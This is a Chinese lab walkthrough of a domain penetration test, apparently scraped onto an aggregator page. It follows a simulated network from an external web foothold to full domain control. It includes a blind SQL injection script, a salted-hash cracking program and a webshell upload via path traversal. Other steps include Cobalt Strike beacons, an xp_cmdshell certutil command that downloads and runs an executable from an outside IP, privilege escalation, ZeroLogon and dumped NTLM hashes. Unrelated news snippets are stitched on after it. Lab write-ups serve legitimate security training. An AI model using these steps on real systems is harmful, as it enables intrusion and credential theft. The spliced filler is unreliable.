范文健康探索娱乐情感热点
投稿投诉
热点动态
科技财经
情感日志
励志美文
娱乐时尚
游戏搞笑
探索旅游
历史星座
健康养生
美丽育儿
范文作文
教案论文
国学影视

域渗透之外网打点到三层内网

  环境搭建1.项目介绍:
  本次项目模拟渗透测试人员在授权的情况下,对目标进行渗透测试,从外网打点到内网横向渗透,最终获取整个内网权限。本次项目属于三层代理内网穿透,会学习到各种内网穿透技术,cobalt strike在内网中各种横行方法,也会学习到在工具利用失败的情况下,手写exp获取边界突破点进入内网,详细介绍外网各种打点方法,学习到行业流行的内网渗透测试办法,对个人提升很有帮助。  2.VPS映射
  1.将ip映射到公网。在公网vps使用配置frp工具的frps.ini 运行frps.exe -c frps.ini
  在web1上配置frpc.ini 运行 frpc.exe -c frp.ini
  成功访问到环境
  http://x.x.x.x:8088/login.jsp
  信息收集1.端口探测
  使用nmap进行端口探测,发现4444、5003、8088、8899、8878端口开放。
  然后查看其详细信息。
  2.网站源代码查找
  发现有一个网上银行系统。使用弱口令和暴力破解,没有爆破出弱口令用户。
  然后就在github试试运气,发现了源码。
  源码地址:https://github.com/amateur-RD/netBank-System
  发现了一个数据库文件,有一些普通用户和管理员用户的账户和密码。
  3.SQL注入
  然后进行登录测试,发现存在sql注入漏洞
  网上银行系统Hsql注入漏洞
  使用sqlmap不能进行跑出用户名和密码。
  4.编写脚本进行sql注入coding:utf-8import requests password="" url="[http://x.x.x.x:8878/admin/login"](http://103.121.93.206:8878/admin/login") payload="0123456789abcdefghijklmnopqrstuvwxyz" password="" for i in range(1,20):  for j in payload:    exp = "admin" and(select substring(password,%s,1) from Admin) like "%s" or "1"="" %(i,j)    print("正在注入")    data = {"admin.username": exp, "admin.password": "aaaa", "type": 1}    req = requests.post(url=url, data=data);    if "密码不正确" in req.text:      password+=j      break print(password)
  成功跑出密码。然后进行登录。
  登录之后,寻找文件上传或者可以获取到webshell的地方,发现没有可利用点。
  5.tomexam SQL注入漏洞
  在另一个地址处,发现可以注册用户。然后注册用户进行登录。
  登录之后发现,某处存在sql注入。
  使用sqlmap进行获取用户信息。
  | 1 | 1 | 1399999999 | 1 | 超级管理员 | admin | admin | 17D03DA6474CE8BEB13B01E79F789E63 | 2022-04-09 00:14:08 | 301 |
  | 6 | 2 | | 1 | | eu3 | eu3 | 4124DDEBABDF97C2430274823B3184D4 (eu3) | 2014-05-17 13:58:49 | 14
  成功抓到了管理员用户和密码,然后使用md5进行解密。
  成功进行登录。登录之后没有找到可getshell的地方。
  6.Jspxcms-SQL注入
  首页发现可以注册用户和进行登录。首先搜索历史漏洞,看看有没有getshell的地方。
  发现先知的大佬做过找个版本的代码审计。参考链接:https://xz.aliyun.com/t/10891?page=1#toc-7。发现可以通过文件上传进行gethshell。
  在之前的tomexam的数据库中,发现存在jspxcms,试试查找一下管理员的用户和信息。
  使用sqlmap进行查找表、用户和吗密码。
  成功发现了用户名和加密的密码。密码推断是明文密码+salt然后再进行md5加密。
  7.编写解密脚本
  通过其源码,分析其加密方式,然后编写解密脚本。  package com.jspxcms.core; import com.jspxcms.common.security.SHA1CredentialsDigest; import com.jspxcms.common.util.Encodes; import java.io.File; import java.io.FileReader; import java.io.FileWriter; import java.io.PrintWriter; import java.util.Scanner; public class Testmain {   public static void main(String[] args)throws Exception {     byte[] salt = Encodes.decodeHex("9b2b38ad7cb62fd9");     SHA1CredentialsDigest test = new SHA1CredentialsDigest();     String fileName = "D:csdnpass.txt";     String fileName2 = "D:hashpassword2.txt";     try (Scanner sc = new Scanner(new FileReader(fileName))) {       while (sc.hasNextLine()) {         String line = sc.nextLine();         String encPass = test.digest(line, salt);         File f = new File(fileName2);         FileWriter fw = new FileWriter(f, true);         PrintWriter pw = new PrintWriter(fw);         pw.println(line + " " + encPass);         pw.close();      }    }  } }
  8.登录jspxcms后台getshell
  使用管理员用户和解密出来的密码,成功进入管理员后台。
  使用哥斯拉生成一个木马,然后使用jar,打包成为war包。
  9.编写目录穿越脚本
  根据先知社区的大佬提出的方法,编写目录穿越脚本。
  成功进行上传。
  10.获取webshell
  使用哥斯拉连接webshell,成功执行命令。
  内网渗透:1.frp反向代理上线CS
  首先配置内网cobalt strike内网上线
  在kali启动cs服务端,
  查看其端口
  配置frp的frps.ini信息。
  2.CS上线
  cs生成监听。
  然后上传.exe文件进行上线。
  成功上线。
  3.内网信息收集
  使用shell iponfig 收集信息。
  根据搭建的拓扑环境,然后测试一下与其他域内主机的连通性。
  查看计算机名。
  使用net view 查找域内其它主机,发现不能找到其他主机。
  4.开启代理进行端口扫描
  查看server2012的IP地址。
  5.域内主机端口扫描
  发现存在1433——Mysql的端口,尝试进行弱口令的暴力破解。
  最好成功爆破出账号和密码.
  6.mssqlclient 登录Mssql服务器
  使用mysql用户和密码进行登录。
  7.xp_cmshell进行getshell
  help查看可以执行那些命令。
  开启xp_cmdshell,然后进行信息收集。
  使用certutil远程下载之前的木马,然后进行上线
  xp_cmdshell certutil -urlcache -split -f http://39.103.134.134/artifact.exe
  c:/windows/temp/artifact.exe
  8.使用SweetPotato (ms16-075)提权
  上线之后,进行简单的信息收集。
  然后使用第三方插件,利用SweetPotato (ms16-075)提权对其进行提权。
  成功提权。
  内网域渗透1.内网域信息收集
  使用net view查看域内主机。
  使用hashdump进行抓取一些用户的hash值。
  查看主机ip地址。
  查看域控的Ip地址,和域控的计算机名。
  2.ZeroLogon CVE-2020-1472 获取域控权限
  编译zerolgin的脚本成为exe,然后进行测试,发现主机存在该漏洞。
  将它设置为空密码。31d6cfe0d16ae931b73c59d7e0c089c0
  3.配置代理,登录域控
  配置kali的代理地址,然后进行端口扫描,测试代理是否连接。
  获取域控的hash值。
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:81220c729f6ccb63d782a77007550f74:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b20eb34f01eaa5ac8b6f80986c765d6d:::
  sec123.cnkcnk:1108:aad3b435b51404eeaad3b435b51404ee:83717c6c405937406f8e0a02a7215b16:::
  AD01$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  SERVER2012$:1109:aad3b435b51404eeaad3b435b51404ee:cc759f89477f1595c993831ce5944e95:::
  然后进行登录域控。
  4.PTH上线CS
  关闭防火墙,利用pth进行上线cs。
  成功执行命令。
  生成tcp监听,然后jump到域控主机。
  5.恢复密码、原hash。
  恢复密码。
  使用 secretsdump.py获取其hash值。
  python3 secretsdump.py -sam sam.save -system system.save -security
  security.save LOCA
  使用:proxychains4 python3 reinstall_original_pw.py ad01 10.10.10.139
  fb61e3c372e666adccb7a820aa39772f恢复域控密码。成功恢复其密码。
  靶机到这里就结束了。
  最后,成功拿下整个域控。
  总结:
  该项目从环境搭建,使用vps将web1主机映射到公网上。通过信息收集,搜索源码,然后分析源码,进行sql注入。编写sql注入脚本进行注入,通过分析登录端的源码编写加密脚本,在编写目录穿越脚本成功获取webshell。在内网渗透中,使用frp反向代理上线cs,使用xp_cmdshell进行getshell。在域渗透中使用CVE-2020-1472获取域控权限。这台靶机中没装杀软,但是从外网打点到内网渗透,再到域渗透中的知识面是非常广的。
  申明:本文仅供技术交流,请自觉遵守网络安全相关法律法规,切勿利用文章内的相关技术从事非法活动,如因此产生的一切不良后果与文章作者无关 本文原创作者: vghost

朱迅变身职场女白领,粉色绸缎套装干练独立,拿捏成熟的职场范儿女性常见的职场穿搭离不开衬衫与西装,同时下半身的选择无非就是西装裤或包臀半身裙,通过展现身材的曲线增加成熟女人味,虽然单品简单但是搭配起来却高级性感,展现了优雅知性的女性魅力,不过从玩具到工具!扫地机器人凭什么能够成功打入千家万户在科技创新的道路上,从来都不乏失败品。尤其是针对机器人在各行各业可行性中的探索,就更是如此。市面上各种炒菜机器人刷碗机器人洗衣机器人层出不穷,但要说哪一种机器人在走进千家万户这一点如何选购激光打印机?花最少的钱,用最好的机器激光打印机由于打印速度快,故障率低,不容易卡纸以及维护方便等特点,成为了大多数人购买办公设备时的首选。激光打印机由于打印机行业水太深,选一款既好用耗材又便宜的机器真的不容易,要么机显卡价格雪崩?卖一张显卡亏3000多元?近期,市面上显卡价格大面积跳水,不少热门显卡价格都遭到了腰斩,甚至砍到膝盖。以最为热门的显卡之一华硕RTX3080为例,去年最高时某电商平台报价近2万元,而目前不到7000元,结束数字人民币试点再扩围,微信支付已开放支持日前,由人民银行召开的数字人民币研发试点工作座谈会上提出,有序扩大试点范围,在现有试点地区基础上增加天津市重庆市广东省广州市福建省福州市和厦门市浙江省承办亚运会的6个城市作为试点地华为nova10Pro即将发布,首搭HarmonyOS3,价格有些意外最近各大品牌都发布了自己的新机,有的发布会都开了好几次了,现在还没有动静的就是华为和魅族了,两个都是大招CD还没好的选手,不过华为这边已经有消息传出了,去年年底华为召开了开发者大会技术基于Smart3D的低空无人机倾斜摄影实景三维建模研究1引言随着无人机技术的快速发展及民用化程度不断提高,无人机相关应用领域的技术研究也在不断拓展。低空无人机测绘就是近些年来快速发展的一个较为活跃的研究领域。无人机作为一个方便高效和低宝宝先断母乳还是先加辅食?妈妈搞反会影响孩子健康,别大意了文菁妈妈妈生孩子是可以休产假的,产假一般是46个月。而妈妈的产假刚好跟孩子可以添加辅食的时间是重合的,我们建议孩子到6个月添加辅食,但是如果有特殊的情况提前一点点添加也是没有问题的塞维利亚西班牙最大和最繁忙的大都市尽管传说将其奠基于腓尼基人,但塞维利亚的存在在罗马时代的瓜达尔基维尔河上得到了证实,在两千多年后,许多遗迹仍保存得很完好,是一件值得称道的事。它还拥有重要的摩尔人遗产,现在是西班牙好消息离北京城区最近的大型湿地公园沙河湿地公园要开工啦在现有沙河水库基础上,建设内容包括湿地生态修复工程和公园建设工程。公园整体布局分为沙河水库段和温榆河段,划分为四个功能区。沙河水库段包括乐跑运动区休闲游憩区湿地科普区温榆河段包括郊大美新疆万里行三十新疆客厅物阜民康天境神池七种地貌景观别样D17(8月11日)乌鲁木齐82。2公里天山天池82。2公里乌鲁木齐2007年,新疆天山天池风景名胜区被国家旅游局评定为5A级风景旅游区。从雪山到北部沙漠的80千米垂直景观带上,呈
越来越多玩家抛弃技术,都不在乎操作,宁愿混也不愿意练?不知道大家发现没有,随着王者荣耀不断更新,最近两年排位技术党玩家越来越少,露娜元歌马超貂蝉这些英雄现在出场率是每况愈下,除了顶端高端局外大家基本都躺平,只玩简单英雄。所以这两个赛季CFHD冠军杯落幕,上线仅半年的新游,如何击中电竞玩家痛点?12月11日晚,CFHD冠军杯结束了最后一场战斗。AG战队以大比分31击败AC顺利捧杯,拿走了200万元冠军奖金。CFHD冠军杯正赛自9月下旬开打,总计进行了60场比赛,是近期穿越原神甘雨复刻时间是什么时候原神甘雨复刻时间原神甘雨复刻时间是什么时候?原神甘雨复刻是不少玩家期待的,这次的甘雨复刻应该已经在路上了,2。4版本就会迎来新的卡池。我们带来了甘雨复刻时间的介绍,一起来看看吧。1甘雨第一次上线是S26赛季大改,新玩家成最大受益者,赛季皮肤获取方式确认本期看点S26赛季大改,新玩家成最大受益者,赛季皮肤获取方式确认文资源君时光匆匆,不知不觉中,王者荣耀S25赛季已经步入尾声,根据S25赛季的战令结束时间以及赛季信息里面的提示来看s26赛季玉环紫色建模美哭,装备特效升级巨酷,白龙马新皮肤突袭文王者小辣椒原创虎年限定皮肤这两天迎来了曝光,最近更是有知名主播张大仙在直播的时候透露,说虎年限定皮肤有两款传说,有一款还是杨玉环。而且在最近杨玉环的皮肤建模还疑似被爆料了出来,可小米12Ultra外观基本确认曲面挖孔屏圆环相机,价格感人作为国内主流手机厂商之一,小米手机这两年的快速发展是大众有目共睹的,尤其是在高端手机市场,小米手机更是取得了明显的进步,无独有偶,在近日多方媒体的不断披露之下,关于小米新一代高端旗王者荣耀程咬金程咬金转动双斧劈砍敌人,对范围内的敌人造成两段伤害,每段造成125150175200225250(60物理加成)点物理伤害。程咬金转动双斧劈砍敌人,对范围内的敌人造成两段伤害,每段MO队直言要roll完库存,ququ继续支持G2,天禄老队员发生分歧说到CSGO解说不得不提的就是现在主播圈最受欢迎的解说搭档csboy,这个由专业解说和前职业选手搭配的解说搭档,有专业解说的全场控制也有职业选手的游戏理解和附带的教学。只能说含金量每一个孩子都是好孩子有时候,你也许会因为自己的孩子在某个方面不如别人而难过,急切地希望他改正,希望他能做得更好,一旦他没有达到,就为之焦虑不安。可是,为什么你不能看到,他本来已经是个好孩子了,他也具有冰雕是甜的,不相信舔一舔2021城事最近有新闻报道说,东北形势不容乐观。要继续严防死守!不仅有点惆怅。原本计划春节去看冰雕的。现在。有一年春节,和几个志同道合的朋友一起去东北看冰雕。第一次看冰雕真的有种震租车环行亚美尼亚,远眺圣经中的阿勒山和神庙,在赛凡湖畔看日落大家好,我是申典启,一个实地走访世界各地,关注全球华人的旅行者亚美尼亚第1站,我在埃里温亚美尼亚这个国家好小啊,大概2个小时就可以横穿整个国家了今天租了一辆车,和两个文化背景很独特